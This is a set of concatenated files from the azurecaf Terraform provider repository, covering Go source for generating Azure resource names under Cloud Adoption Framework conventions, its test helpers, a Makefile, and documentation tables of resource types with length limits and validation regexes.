| cafrandom | follows Cloud Adoption Framework for Azure recommendations as per https://docs.microsoft.com/en-us/azure/cloud-adoption-framework/ready/azure-best-practices/naming-and-tagging and adds randomly generated characters up to maximum length of name |
| random | name will be generated automatically in full lengths of azure object |
| passthrough | naming convention is implemented manually, fields given as input will be same as the output (but lengths and forbidden chars will be filtered out) |
## Resource types
We define resource types as per: https://docs.microsoft.com/en-us/azure/cloud-adoption-framework/ready/azure-best-practices/naming-and-tagging
Current prototype supports:
| Resource type | Resource type code (short) | Resource type code (long) |
| ----------------------------------- | ----------------------------|-----------------------------------------|
| Azure Automation | aaa | azurerm_automation_account |
| Azure Container App | ac | azurerm_container_app |
| Azure Container App Environment | ace | azurerm_container_app_environment |
| Azure Container Registry | acr | azurerm_container_registry |
| Azure Firewall | afw | azurerm_firewall |
| Application Gateway | agw | azurerm_application_gateway |
| API Management | apim | azurerm_api_management |
| App Service | app | azurerm_app_service |
| Application Insights | appi | azurerm_application_insights |
| App Service Environment | ase | azurerm_app_service_environment |
| Azure Kubernetes Service | aks | azurerm_kubernetes_cluster |
| Azure Kubernetes Service DNS prefix | aksdns | aks_dns_prefix |
| AKS Node Pool Linux | aksnpl | aks_node_pool_linux |
| AKS Node Pool Windows | aksnpw | aks_node_pool_windows |
| Azure Site Recovery | asr | azurerm_recovery_services_vault |
| Azure Event Hubs | evh | azurerm_eventhub_namespace |
| generic | gen | generic |
| Azure Key Vault | kv | azurerm_key_vault |
| Azure Monitor Log Analytics | la | azurerm_log_analytics_workspace |
| Virtual Network Interface Card | nic | azurerm_network_interface |
| Network Security Group | nsg | azurerm_network_security_group |
| Public IP | pip | azurerm_public_ip |
| App Service Plan | plan | azurerm_app_service_plan |
| Resource group | rg | azurerm_resource_group |
| Subnet | snet | azurerm_subnet |
| Azure SQL DB Server | sql | azurerm_sql_server |
| Azure SQL DB | sqldb | azurerm_sql_database |
| Azure Storage Account | st | azurerm_storage_account |
| Linux Virtual Machine | vml | azurerm_virtual_machine_linux |
| Windows Virtual Machine | vmw | azurerm_virtual_machine_windows |
| Virtual Network | vnet | azurerm_virtual_network |
<file_sep>/azurecaf/resource_naming_convention_test.go
package azurecaf
import (
"fmt"
"regexp"
"strings"
"github.com/hashicorp/terraform-plugin-sdk/v2/helper/resource"
"github.com/hashicorp/terraform-plugin-sdk/v2/terraform"
)
func testAccCafNamingValidation(id string, name string, expectedLength int, prefix string) resource.TestCheckFunc {
return func(s *terraform.State) error {
rs, ok := s.RootModule().Resources[id]
if !ok {
return fmt.Errorf("Not found: %s", id)
}
if rs.Primary.ID == "" {
return fmt.Errorf("No ID is set")
}
attrs := rs.Primary.Attributes
result := attrs["result"]
if len(result) != expectedLength {
return fmt.Errorf("got %s %d result items; want %d", result, len(result), expectedLength)
}
if !strings.HasPrefix(result, prefix) {
return fmt.Errorf("got %s which doesn't start with %s", result, prefix)
}
if !strings.Contains(result, name) {
return fmt.Errorf("got %s which doesn't contain the name %s", result, name)
}
return nil
}
}
func regexMatch(id string, exp *regexp.Regexp, requiredMatches int) resource.TestCheckFunc {
return func(s *terraform.State) error {
rs, ok := s.RootModule().Resources[id]
if !ok {
return fmt.Errorf("Not found: %s", id)
}
if rs.Primary.ID == "" {
return fmt.Errorf("No ID is set")
}
result := rs.Primary.Attributes["result"]
if matches := exp.FindAllStringSubmatchIndex(result, -1); len(matches) != requiredMatches {
return fmt.Errorf("result string is %s; did not match %s, got %d", result, exp, len(matches))
}
return nil
}
}
<file_sep>/azurecaf/data_name.go
package azurecaf
import (
"context"
"github.com/hashicorp/terraform-plugin-sdk/v2/diag"
"github.com/hashicorp/terraform-plugin-sdk/v2/helper/schema"
"github.com/hashicorp/terraform-plugin-sdk/v2/helper/validation"
)
func dataName() *schema.Resource {
resourceMapsKeys := make([]string, 0, len(ResourceDefinitions))
for k := range ResourceDefinitions {
resourceMapsKeys = append(resourceMapsKeys, k)
}
return &schema.Resource{
ReadContext: dataNameRead,
Schema: map[string]*schema.Schema{
"name": {
Type: schema.TypeString,
Optional: true,
ForceNew: true,
Default: "",
},
"prefixes": {
Type: schema.TypeList,
Elem: &schema.Schema{
Type: schema.TypeString,
ValidateFunc: validation.NoZeroValues,
},
Optional: true,
ForceNew: true,
},
"suffixes": {
Type: schema.TypeList,
Elem: &schema.Schema{
Type: schema.TypeString,
ValidateFunc: validation.NoZeroValues,
},
Optional: true,
ForceNew: true,
},
"random_length": {
Type: schema.TypeInt,
Optional: true,
ForceNew: true,
ValidateFunc: validation.IntAtLeast(0),
Default: 0,
},
"result": {
Type: schema.TypeString,
Computed: true,
},
"separator": {
Type: schema.TypeString,
Optional: true,
ForceNew: true,
Default: "-",
},
"clean_input": {
Type: schema.TypeBool,
Optional: true,
ForceNew: true,
Default: true,
},
"passthrough": {
Type: schema.TypeBool,
Optional: true,
ForceNew: true,
Default: false,
},
"resource_type": {
Type: schema.TypeString,
Optional: true,
ValidateFunc: validation.StringInSlice(resourceMapsKeys, false),
ForceNew: true,
},
"random_seed": {
Type: schema.TypeInt,
Optional: true,
ForceNew: true,
},
"use_slug": {
Type: schema.TypeBool,
Optional: true,
ForceNew: true,
Default: true,
},
},
}
}
func dataNameRead(ctx context.Context, d *schema.ResourceData, meta interface{}) diag.Diagnostics {
getNameReadResult(d, meta)
return diag.Diagnostics{}
}
func getNameReadResult(d *schema.ResourceData, meta interface{}) error {
name := d.Get("name").(string)
prefixes := convertInterfaceToString(d.Get("prefixes").([]interface{}))
suffixes := convertInterfaceToString(d.Get("suffixes").([]interface{}))
separator := d.Get("separator").(string)
resourceType := d.Get("resource_type").(string)
cleanInput := d.Get("clean_input").(bool)
passthrough := d.Get("passthrough").(bool)
useSlug := d.Get("use_slug").(bool)
randomLength := d.Get("random_length").(int)
randomSeed := int64(d.Get("random_seed").(int))
convention := ConventionCafClassic
randomSuffix := randSeq(int(randomLength), &randomSeed)
namePrecedence := []string{"name", "slug", "random", "suffixes", "prefixes"}
resourceName, err := getResourceName(resourceType, separator, prefixes, name, suffixes, randomSuffix, convention, cleanInput, passthrough, useSlug, namePrecedence)
if err != nil {
return err
}
d.Set("result", resourceName)
d.SetId(resourceName)
return nil
}
<file_sep>/azurecaf/provider_test.go
package azurecaf
import (
"testing"
"github.com/hashicorp/terraform-plugin-sdk/v2/helper/schema"
"github.com/hashicorp/terraform-plugin-sdk/v2/terraform"
)
var testAccProviders map[string]*schema.Provider
var testAccProvider *schema.Provider
func init() {
testAccProvider = Provider()
testAccProviders = map[string]*schema.Provider{
"azurecaf": testAccProvider,
}
}
func TestProvider(t *testing.T) {
if err := Provider().InternalValidate(); err != nil {
t.Fatalf("err: %s", err)
}
}
func TestProvider_impl(t *testing.T) {
var _ *schema.Provider = Provider()
}
func testAccPreCheck(t *testing.T) {
}
// Resource are locale and are no instrastructure is created in the test suite
func testAccCheckResourceDestroy(s *terraform.State) error {
return nil
}
<file_sep>/azurecaf/data_environment_variable.go
package azurecaf
import (
"context"
"github.com/hashicorp/terraform-plugin-sdk/v2/diag"
"github.com/hashicorp/terraform-plugin-sdk/v2/helper/schema"
"os"
)
func dataEnvironmentVariable() *schema.Resource {
return &schema.Resource{
ReadContext: resourceAction,
Schema: map[string]*schema.Schema{
"name": {
Type: schema.TypeString,
Required: true,
Description: "Name of the environment variable.",
},
"fails_if_empty": {
Type: schema.TypeBool,
Optional: true,
Default: false,
Description: "Throws an error if the environment variable is not set (default: false).",
},
"value": {
Type: schema.TypeString,
Computed: true,
Description: "Value of the environment variable.",
Sensitive: true,
},
},
}
}
func resourceAction(ctx context.Context, d *schema.ResourceData, meta interface{}) diag.Diagnostics {
var diags diag.Diagnostics
name := d.Get("name").(string)
value, ok := os.LookupEnv(name)
if !ok {
return diag.Errorf("Value is not set for environment variable: %s", name)
}
d.SetId(name)
_ = d.Set("value", value)
return diags
}
<file_sep>/main.go
package main
import (
"github.com/aztfmod/terraform-provider-azurecaf/azurecaf"
"github.com/hashicorp/terraform-plugin-sdk/v2/helper/schema"
"github.com/hashicorp/terraform-plugin-sdk/v2/plugin"
)
//go:generate go run gen.go
func main() {
plugin.Serve(&plugin.ServeOpts{
ProviderFunc: func() *schema.Provider {
return azurecaf.Provider()
},
})
}
<file_sep>/completness/existing.go
package main
import (
"bufio"
"encoding/json"
"fmt"
"io/ioutil"
"log"
"os"
"path"
"sort"
)
// The idea of this package it is to check for package completness
// To update the list of existing resources I did query
// https://registry.terraform.io/v2/provider-versions/7185?include=provider-docs
// them use the jq espression `"azurerm_\(.included[].attributes.title)"`
// followed by manual cleaning of the non resources doc links
// ResourceStructure resource definition structure
// Copied from gen.go
type ResourceStructure struct {
// Resource type name
ResourceTypeName string `json:"name"`
// Resource prefix as defined in the Azure Cloud Adoption Framework
CafPrefix string `json:"slug,omitempty"`
// MaxLength attribute define the maximum length of the name
MinLength int `json:"min_length"`
// MaxLength attribute define the maximum length of the name
MaxLength int `json:"max_length"`
// enforce lowercase
LowerCase bool `json:"lowercase,omitempty"`
// Regular expression to apply to the resource type
RegEx string `json:"regex,omitempty"`
// the Regular expression to validate the generated string
ValidationRegExp string `json:"validation_regex,omitempty"`
// can the resource include dashes
Dashes bool `json:"dashes"`
// The scope of this name where it needs to be unique
Scope string `json:"scope,omitempty"`
}
func main() {
wd, err := os.Getwd()
sourceDefinitions, err := ioutil.ReadFile(path.Join(wd, "../resourceDefinition.json"))
if err != nil {
log.Fatal(err)
}
s, err := readLines(path.Join(wd, "/existing_tf_resources.txt"))
if err != nil {
log.Fatal(err)
}
sort.Strings(s)
var data []ResourceStructure
err = json.Unmarshal(sourceDefinitions, &data)
if err != nil {
log.Fatal(err)
}
implemented := make(map[string]bool)
for _, name := range s {
_, found := findByName(data, name)
implemented[name] = found
}
fmt.Println("|resource | status |")
fmt.Println("|---|---|")
current := ""
for _, name := range s {
if name == current {
continue
} else {
current = name
}
status := "❌"
if implemented[name] {
status = "✔"
}
fmt.Printf("|%s | %s |\n", name, status)
}
}
func findByName(slice []ResourceStructure, name string) (int, bool) {
for i, item := range slice {
if item.ResourceTypeName == name {
return i, true
}
}
return -1, false
}
func readLines(path string) ([]string, error) {
file, err := os.Open(path)
if err != nil {
return nil, err
}
defer file.Close()
var lines []string
scanner := bufio.NewScanner(file)
for scanner.Scan() {
lines = append(lines, scanner.Text())
}
return lines, scanner.Err()
}
<file_sep>/Makefile
default: help
# Add help text after each target name starting with '\#\#'
# Found here: https://gist.github.com/prwhite/8168133
.PHONY: help
help: ## Display help
@awk 'BEGIN {FS = ":.*##"; printf "\nUsage:\n make \033[36m\033[0m\n"} /^[a-zA-Z_-]+:.*?##/ { printf " \033[36m%-15s\033[0m %s\n", $$1, $$2 } /^##@/ { printf "\n\033[1m%s\033[0m\n", substr($$0, 5) } ' $(MAKEFILE_LIST)
dev_container:
go generate
go fmt
go build -o ~/.terraform.d/plugins/linux_amd64/terraform-provider-azurecaf
build: ## Build the project
go generate
go fmt ./...
go build -o ./terraform-provider-azurecaf
go test ./...
unittest: ## Init go test
go test ./...
tfproviderlint ./...
test: # Start a terraform test / invisible help comment
cd ./examples && terraform init && terraform plan && terraform apply -auto-approve
generate_resource_table: ## Generate resource table (output only)
cat resourceDefinition.json | jq -r '.[] | "| \(.name)| \(.slug)| \(.min_length)| \(.max_length)| \(.lowercase)| \(.validation_regex)|"'
cat resourceDefinition_out_of_docs.json | jq -r '.[] | "| \(.name)| \(.slug)| \(.min_length)| \(.max_length)| \(.lowercase)| \(.validation_regex)|"'
<file_sep>/docs/index.md
# Azurecaf provider
The Azurecaf provider is a *logical provider* which means that it works entirely within Terraform's logic, and doesn't interact with any other services. The goal of this provider is to provider helper methods in implementing Azure landing zones using Terraform.
The Azurecaf provider currently contains a two resources based on the Terraform Random_string provider. The naming_convention resources enforce is the first iteration of our naming convention implementation enforcing Azure Cloud Adoption Framework naming convention.
As per the growing number of azure resources a new implementation is now available using the azurecaf_name resource to avoid breaking changes. The new implementation supports an extensive list of resource types and will be updated on a regular basis as new services are released
## Resource types
We define resource types as per: https://docs.microsoft.com/en-us/azure/cloud-adoption-framework/ready/azure-best-practices/naming-and-tagging
Current supported resource types:
| Resource type | Resource type code (short) | minimum length | maximum length | lowercase only | validation regex |
| ------------------------| ----------------------------|-----------------|-----------------|----------------|-------------------------------------------|
| azurerm_analysis_services_server| as| 3| 63| true| "^[a-z][a-z0-9]{2,62}$" |
| azurerm_api_management_service| apim| 1| 50| false| "^[a-z][a-zA-Z0-9-][a-zA-Z0-9]{0,48}$"|
| azurerm_app_configuration| appcg| 5| 50| false| "^[a-zA-Z0-9_-]{5,50}$"|
| azurerm_role_assignment| ra| 1| 64| false| "^[^%]{0,63}[^ %.]$"|
| azurerm_role_definition| rd| 1| 64| false| "^[^%]{0,63}[^ %.]$"|
| azurerm_automation_account| aa| 6| 50| false| "^[a-zA-Z][a-zA-Z0-9-]{4,48}[a-zA-Z0-9]$"|
| azurerm_automation_certificate| aacert| 1| 128| false| "^[^<>*%:.?\\+\\/]{0,127}[^<>*%:.?\\+\\/ ]$"|
| azurerm_automation_credential| aacred| 1| 128| false| "^[^<>*%:.?\\+\\/]{0,127}[^<>*%:.?\\+\\/ ]$"|
| azurerm_automation_runbook| aarun| 1| 63| false| "^[a-zA-Z][a-zA-Z0-9-]{0,62}$"|
| azurerm_automation_schedule| aasched| 1| 128| false| "^[^<>*%:.?\\+\\/]{0,127}[^<>*%:.?\\+\\/ ]$"|
| azurerm_automation_variable| aavar| 1| 128| false| "^[^<>*%:.?\\+\\/]{0,127}[^<>*%:.?\\+\\/ ]$"|
| azurerm_batch_account| ba| 3| 24| true| "^[a-z0-9]{3,24}$"|
| azurerm_batch_application| baapp| 1| 64| false| "^[a-zA-Z0-9_-]{1,64}$"|
| azurerm_batch_certificate| bacert| 5| 45| false| "^[a-zA-Z0-9_-]{5,45}$"|
| azurerm_batch_pool| bapool| 3| 24| false| "^[a-zA-Z0-9_-]{1,24}$"|
| azurerm_bot_web_app| bot| 2| 64| false| "^[a-zA-Z0-9][a-zA-Z0-9-_.]{1,63}$"|
| azurerm_bot_channel_Email| botmail| 2| 64| false| "^[a-zA-Z0-9][a-zA-Z0-9-_.]{1,63}$"|
| azurerm_bot_channel_ms_teams| botteams| 2| 64| false| "^[a-zA-Z0-9][a-zA-Z0-9-_.]{1,63}$"|
| azurerm_bot_channel_slack| botslack| 2| 64| false| "^[a-zA-Z0-9][a-zA-Z0-9-_.]{1,63}$"|
| azurerm_bot_channel_directline| botline| 2| 64| false| "^[a-zA-Z0-9][a-zA-Z0-9-_.]{1,63}$"|
| azurerm_bot_channels_registration| botchan| 2| 64| false| "^[a-zA-Z0-9][a-zA-Z0-9-_.]{1,63}$"|
| azurerm_bot_connection| botcon| 2| 64| false| "^[a-zA-Z0-9][a-zA-Z0-9-_.]{1,63}$"|
| azurerm_redis_cache| redis| 1| 63| false| "^[a-zA-Z0-9][a-zA-Z0-9-]{0,61}[a-zA-Z0-9]$"|
| azurerm_redis_firewall_rule| redisfw| 1| 256| false| "^[a-zA-Z0-9]{1,256}$"|
| azurerm_cdn_profile| cdnprof| 1| 260| false| "^[a-zA-Z0-9][a-zA-Z0-9-]{0,258}[a-zA-Z0-9]$"|
| azurerm_cdn_endpoint| cdn| 1| 50| false| "^[a-zA-Z0-9][a-zA-Z0-9-]{0,48}[a-zA-Z0-9]$"|
| azurerm_cognitive_account| cog| 2| 64| false| "^[a-zA-Z0-9][a-zA-Z0-9-]{0,63}$"|
| azurerm_availability_set| avail| 1| 80| false| "^[a-zA-Z0-9][a-zA-Z0-9-_.]{0,78}[a-zA-Z0-9_]$"|
| azurerm_disk_encryption_set| des| 1| 80| false| "^[a-zA-Z0-9_]{1,80}$"|
| azurerm_image| img| 1| 80| false| "^[a-zA-Z0-9][a-zA-Z0-9-_.]{0,78}[a-zA-Z0-9_]$"|
| azurerm_linux_virtual_machine| vm| 1| 64| false| "^[^\\/\"\\[\\]:|<>+=;,?*@&_][^\\/\"\\[\\]:|<>+=;,?*@&]{0,62}[^\\/\"\\[\\]:|<>+=;,?*@&.-]$"|
| azurerm_linux_virtual_machine_scale_set| vmss| 1| 64| false| "^[^\\/\"\\[\\]:|<>+=;,?*@&_][^\\/\"\\[\\]:|<>+=;,?*@&]{0,62}[^\\/\"\\[\\]:|<>+=;,?*@&.-]$"|
| azurerm_managed_disk| dsk| 1| 80| false| "^[a-zA-Z0-9][a-zA-Z0-9_.-]{0,78}[a-zA-Z0-9_]$"|
| azurerm_virtual_machine| vm| 1| 15| false| "^[^\\/\"\\[\\]:|<>+=;,?*@&_][^\\/\"\\[\\]:|<>+=;,?*@&]{0,13}[^\\/\"\\[\\]:|<>+=;,?*@&.-]$"|
| azurerm_virtual_machine_scale_set| vmss| 1| 15| false| "^[^\\/\"\\[\\]:|<>+=;,?*@&_][^\\/\"\\[\\]:|<>+=;,?*@&]{0,13}[^\\/\"\\[\\]:|<>+=;,?*@&.-]$"|
| azurerm_windows_virtual_machine| vm| 1| 15| false| "^[^\\/\"\\[\\]:|<>+=;,?*@&_][^\\/\"\\[\\]:|<>+=;,?*@&]{0,13}[^\\/\"\\[\\]:|<>+=;,?*@&.-]$"|
| azurerm_windows_virtual_machine_scale_set| vmss| 1| 15| false| "^[^\\/\"\\[\\]:|<>+=;,?*@&_][^\\/\"\\[\\]:|<>+=;,?*@&]{0,13}[^\\/\"\\[\\]:|<>+=;,?*@&.-]$"|
| azurerm_containerGroups| cg| 1| 63| false| "^[a-zA-Z0-9][a-zA-Z0-9-]{0,61}[a-zA-Z0-9]$"|
| azurerm_container_app| ca| 1| 32| true| "^[a-z0-9][a-z0-9-]{0,30}[a-z0-9]$"|
| azurerm_container_app_environment| cae| 1| 60| false| "^[0-9A-Za-z][0-9A-Za-z-]{0,58}[0-9a-zA-Z]$"|
| azurerm_container_registry| cr| 1| 63| true| "^[a-zA-Z0-9]{1,63}$"|
| azurerm_container_registry_webhook| crwh| 1| 50| false| "^[a-zA-Z0-9]{1,50}$"|
| azurerm_kubernetes_cluster| aks| 1| 63| false| "^[a-zA-Z0-9][a-zA-Z0-9-_.]{0,61}[a-zA-Z0-9]$"|
| azurerm_cosmosdb_account| cosmos| 1| 63| false| "^[a-z0-9][a-zA-Z0-9-_.]{0,61}[a-zA-Z0-9]$"|
| azurerm_custom_provider| prov| 3| 64| false| "^[^&%?\\/]{2,63}[^&%.?\\/ ]$"|
| azurerm_mariadb_server| maria| 3| 63| false| "^[a-z0-9][a-zA-Z0-9-]{1,61}[a-z0-9]$"|
| azurerm_mariadb_firewall_rule| mariafw| 1| 128| false| "^[a-zA-Z0-9-_]{1,128}$"|
| azurerm_mariadb_database| mariadb| 1| 63| false| "^[a-zA-Z0-9-_]{1,63}$"|
| azurerm_mariadb_virtual_network_rule| mariavn| 1| 128| false| "^[a-zA-Z0-9-_]{1,128}$"|
| azurerm_mysql_server| mysql| 3| 63| false| "^[a-z0-9][a-zA-Z0-9-]{1,61}[a-z0-9]$"|
| azurerm_mysql_firewall_rule| mysqlfw| 1| 128| false| "^[a-zA-Z0-9-_]{1,128}$"|
| azurerm_mysql_database| mysqldb| 1| 63| false| "^[a-zA-Z0-9-_]{1,63}$"|
| azurerm_mysql_virtual_network_rule| mysqlvn| 1| 128| false| "^[a-zA-Z0-9-_]{1,128}$"|
| azurerm_postgresql_server| psql| 3| 63| false| "^[a-z0-9][a-zA-Z0-9-]{1,61}[a-z0-9]$"|
| azurerm_postgresql_firewall_rule| psqlfw| 1| 128| false| "^[a-zA-Z0-9-_]{1,128}$"|
| azurerm_postgresql_database| psqldb| 1| 63| false| "^[a-zA-Z0-9-_]{1,63}$"|
| azurerm_postgresql_virtual_network_rule| psqlvn| 1| 128| false| "^[a-zA-Z0-9-_]{1,128}$"|
| azurerm_database_migration_project| migr| 2| 57| false| "^[a-zA-Z0-9][a-zA-Z0-9-_.]{1,56}$"|
| azurerm_database_migration_service| dms| 2| 62| false| "^[a-zA-Z0-9][a-zA-Z0-9-_.]{1,61}$"|
| azurerm_databricks_workspace| dbw| 3| 30| false| "^[a-zA-Z0-9-_]{3,30}$"|
| azurerm_kusto_cluster| kc| 4| 22| false| "^[a-z][a-z0-9]{3,21}$"|
| azurerm_kusto_database| kdb| 1| 260| false| "^[a-zA-Z0-9- .]{1,260}$"|
| azurerm_kusto_eventhub_data_connection| kehc| 1| 40| false| "^[a-zA-Z0-9- .]{1,40}$"|
| azurerm_data_factory| adf| 3| 63| false| "^[a-zA-Z0-9][a-zA-Z0-9-]{1,61}[a-zA-Z0-9]$"|
| azurerm_data_factory_dataset_mysql| adfmysql| 1| 260| false| "^[a-zA-Z0-9][^<>*%:.?\\+\\/]{0,258}[a-zA-Z0-9]$"|
| azurerm_data_factory_dataset_postgresql| adfpsql| 1| 260| false| "^[a-zA-Z0-9][^<>*%:.?\\+\\/]{0,258}[a-zA-Z0-9]$"|
| azurerm_data_factory_dataset_sql_server_table| adfmssql| 1| 260| false| "^[a-zA-Z0-9][^<>*%:.?\\+\\/]{0,258}[a-zA-Z0-9]$"|
| azurerm_data_factory_integration_runtime_managed| adfir| 3| 63| false| "^[a-zA-Z0-9][a-zA-Z0-9-]{1,61}[a-zA-Z0-9]$"|
| azurerm_data_factory_pipeline| adfpl| 1| 260| false| "^[a-zA-Z0-9][^<>*%:.?\\+\\/]{0,258}[a-zA-Z0-9]$"|
| azurerm_data_factory_linked_service_data_lake_storage_gen2| adfsvst| 1| 260| false| "^[a-zA-Z0-9][^<>*%:.?\\+\\/]{0,259}$"|
| azurerm_data_factory_linked_service_key_vault| adfsvkv| 1| 260| false| "^[a-zA-Z0-9][^<>*%:.?\\+\\/]{0,259}$"|
| azurerm_data_factory_linked_service_mysql| adfsvmysql| 1| 260| false| "^[a-zA-Z0-9][^<>*%:.?\\+\\/]{0,259}$"|
| azurerm_data_factory_linked_service_postgresql| adfsvpsql| 1| 260| false| "^[a-zA-Z0-9][^<>*%:.?\\+\\/]{0,259}$"|
| azurerm_data_factory_linked_service_sql_server| adfsvmssql| 1| 260| false| "^[a-zA-Z0-9][^<>*%:.?\\+\\/]{0,259}$"|
| azurerm_data_factory_trigger_schedule| adftg| 1| 260| false| "^[a-zA-Z0-9][^<>*%:.?\\+\\/]{0,259}$"|
| azurerm_data_lake_analytics_account| dla| 3| 24| false| "^[a-z0-9]{3,24}$"|
| azurerm_data_lake_analytics_firewall_rule| dlfw| 3| 50| false| "^[a-z0-9-_]{3,50}$"|
| azurerm_data_lake_store| dls| 3| 24| false| "^[a-z0-9]{3,24}$"|
| azurerm_data_lake_store_firewall_rule| dlsfw| 3| 50| false| "^[a-zA-Z0-9-_]{3,50}$"|
| azurerm_dev_test_lab| lab| 1| 50| false| "^[a-zA-Z0-9-_]{1,50}$"|
| azurerm_dev_test_linux_virtual_machine| labvm| 1| 64| false| "^[a-zA-Z0-9-]{1,64}$"|
| azurerm_dev_test_windows_virtual_machine| labvm| 1| 15| false| "^[a-zA-Z0-9-]{1,15}$"|
| azurerm_frontdoor| fd| 5| 64| false| "^[a-zA-Z0-9][a-zA-Z0-9-]{3,62}[a-zA-Z0-9]$"|
| azurerm_frontdoor_firewall_policy| fdfw| 1| 80| false| "^[a-zA-Z0-9][a-zA-Z0-9-._]{0,78}[a-zA-Z0-9_]$"|
| azurerm_hdinsight_hadoop_cluster| hadoop| 3| 59| false| "^[a-zA-Z0-9][a-zA-Z0-9-]{1,57}[a-zA-Z0-9]$"|
| azurerm_hdinsight_hbase_cluster| hbase| 3| 59| false| "^[a-zA-Z0-9][a-zA-Z0-9-]{1,57}[a-zA-Z0-9]$"|
| azurerm_hdinsight_kafka_cluster| kafka| 3| 59| false| "^[a-zA-Z0-9][a-zA-Z0-9-]{1,57}[a-zA-Z0-9]$"|
| azurerm_hdinsight_interactive_query_cluster| iqr| 3| 59| false| "^[a-zA-Z0-9][a-zA-Z0-9-]{1,57}[a-zA-Z0-9]$"|
| azurerm_hdinsight_ml_services_cluster| mls| 3| 59| false| "^[a-zA-Z0-9][a-zA-Z0-9-]{1,57}[a-zA-Z0-9]$"|
| azurerm_hdinsight_rserver_cluster| rser| 3| 59| false| "^[a-zA-Z0-9][a-zA-Z0-9-]{1,57}[a-zA-Z0-9]$"|
| azurerm_hdinsight_spark_cluster| spark| 3| 59| false| "^[a-zA-Z0-9][a-zA-Z0-9-]{1,57}[a-zA-Z0-9]$"|
| azurerm_hdinsight_storm_cluster| storm| 3| 59| false| "^[a-zA-Z0-9][a-zA-Z0-9-]{1,57}[a-zA-Z0-9]$"|
| azurerm_iotcentral_application| iotapp| 2| 63| true| "^[a-z0-9][a-z0-9-]{0,61}[a-z0-9]$"|
| azurerm_iothub| iot| 3| 50| false| "^[a-zA-Z0-9][a-zA-Z0-9-]{1,48}[a-z0-9]$"|
| azurerm_iothub_consumer_group| iotcg| 1| 50| false| "^[a-zA-Z0-9-._]{1,50}$"|
| azurerm_iothub_dps| dps| 3| 64| false| "^[a-zA-Z0-9-]{1,63}[a-zA-Z0-9]$"|
| azurerm_iothub_dps_certificate| dpscert| 1| 64| false| "^[a-zA-Z0-9-._]{1,64}$"|
| azurerm_key_vault| kv| 3| 24| false| "^[a-zA-Z][a-zA-Z0-9-]{1,22}[a-zA-Z0-9]$"|
| azurerm_key_vault_key| kvk| 1| 127| false| "^[a-zA-Z0-9-]{1,127}$"|
| azurerm_key_vault_secret| kvs| 1| 127| false| "^[a-zA-Z0-9-]{1,127}$"|
| azurerm_key_vault_certificate| kvc| 1| 127| false| "^[a-zA-Z0-9-]{1,127}$"|
| azurerm_lb| lb| 1| 80| false| "^[a-zA-Z0-9][a-zA-Z0-9-._]{0,78}[a-zA-Z0-9_]$"|
| azurerm_lb_nat_rule| lbnatrl| 1| 80| false| "^[a-zA-Z0-9][a-zA-Z0-9-._]{0,78}[a-zA-Z0-9_]$"|
| azurerm_public_ip| pip| 1| 80| false| "^[a-zA-Z0-9][a-zA-Z0-9-._]{0,78}[a-zA-Z0-9_]$"|
| azurerm_public_ip_prefix| pippf| 1| 80| false| "^[a-zA-Z0-9][a-zA-Z0-9-._]{0,78}[a-zA-Z0-9_]$"|
| azurerm_route| rt| 1| 80| false| "^[a-zA-Z0-9][a-zA-Z0-9-._]{0,78}[a-zA-Z0-9_]$"|
| azurerm_route_table| route| 1| 80| false| "^[a-zA-Z0-9][a-zA-Z0-9-._]{0,78}[a-zA-Z0-9_]$"|
| azurerm_subnet| snet| 1| 80| false| "^[a-zA-Z0-9][a-zA-Z0-9-._]{0,78}[a-zA-Z0-9_]$"|
| azurerm_traffic_manager_profile| traf| 1| 63| false| "^[a-zA-Z0-9][a-zA-Z0-9-.]{0,61}[a-zA-Z0-9_]$"|
| azurerm_virtual_wan| vwan| 1| 80| false| "^[a-zA-Z0-9][a-zA-Z0-9-._]{0,78}[a-zA-Z0-9_]$"|
| azurerm_virtual_network| vnet| 2| 64| false| "^[a-zA-Z0-9][a-zA-Z0-9-._]{0,62}[a-zA-Z0-9_]$"|
| azurerm_virtual_network_gateway| vgw| 1| 80| false| "^[a-zA-Z0-9][a-zA-Z0-9-._]{0,78}[a-zA-Z0-9_]$"|
| azurerm_virtual_network_peering| vpeer| 1| 80| false| "^[a-zA-Z0-9][a-zA-Z0-9-._]{0,78}[a-zA-Z0-9_]$"|
| azurerm_network_interface| nic| 1| 80| false| "^[a-zA-Z0-9][a-zA-Z0-9-._]{0,78}[a-zA-Z0-9_]$"|
| azurerm_firewall| fw| 1| 80| false| "^[a-zA-Z0-9][a-zA-Z0-9-._]{0,78}[a-zA-Z0-9_]$"|
| azurerm_eventhub| evh| 1| 50| false| "^[a-zA-Z0-9][a-zA-Z0-9-._]{0,48}[a-zA-Z0-9]$"|
| azurerm_eventhub_namespace| ehn| 1| 50| false| "^[a-zA-Z][a-zA-Z0-9-]{0,48}[a-zA-Z0-9]$"|
| azurerm_eventhub_authorization_rule| ehar| 1| 50| false| "^[a-zA-Z0-9][a-zA-Z0-9-._]{0,48}[a-zA-Z0-9]$"|
| azurerm_eventhub_namespace_authorization_rule| ehnar| 1| 50| false| "^[a-zA-Z0-9][a-zA-Z0-9-._]{0,48}[a-zA-Z0-9]$"|
| azurerm_eventhub_namespace_disaster_recovery_config| ehdr| 1| 50| false| "^[a-zA-Z0-9][a-zA-Z0-9-._]{0,48}[a-zA-Z0-9]$"|
| azurerm_eventhub_consumer_group| ehcg| 1| 50| false| "^[a-zA-Z0-9][a-zA-Z0-9-._]{0,48}[a-zA-Z0-9]$"|
| azurerm_stream_analytics_job| asa| 3| 63| false| "^[a-zA-Z0-9-_]{3,63}$"|
| azurerm_stream_analytics_function_javascript_udf| asafunc| 3| 63| false| "^[a-zA-Z0-9-_]{3,63}$"|
| azurerm_stream_analytics_output_blob| asaoblob| 3| 63| false| "^[a-zA-Z0-9-_]{3,63}$"|
| azurerm_stream_analytics_output_mssql| asaomssql| 3| 63| false| "^[a-zA-Z0-9-_]{3,63}$"|
| azurerm_stream_analytics_output_eventhub| asaoeh| 3| 63| false| "^[a-zA-Z0-9-_]{3,63}$"|
| azurerm_stream_analytics_output_servicebus_queue| asaosbq| 3| 63| false| "^[a-zA-Z0-9-_]{3,63}$"|
| azurerm_stream_analytics_output_servicebus_topic| asaosbt| 3| 63| false| "^[a-zA-Z0-9-_]{3,63}$"|
| azurerm_stream_analytics_reference_input_blob| asarblob| 3| 63| false| "^[a-zA-Z0-9-_]{3,63}$"|
| azurerm_stream_analytics_stream_input_blob| asaiblob| 3| 63| false| "^[a-zA-Z0-9-_]{3,63}$"|
| azurerm_stream_analytics_stream_input_eventhub| asaieh| 3| 63| false| "^[a-zA-Z0-9-_]{3,63}$"|
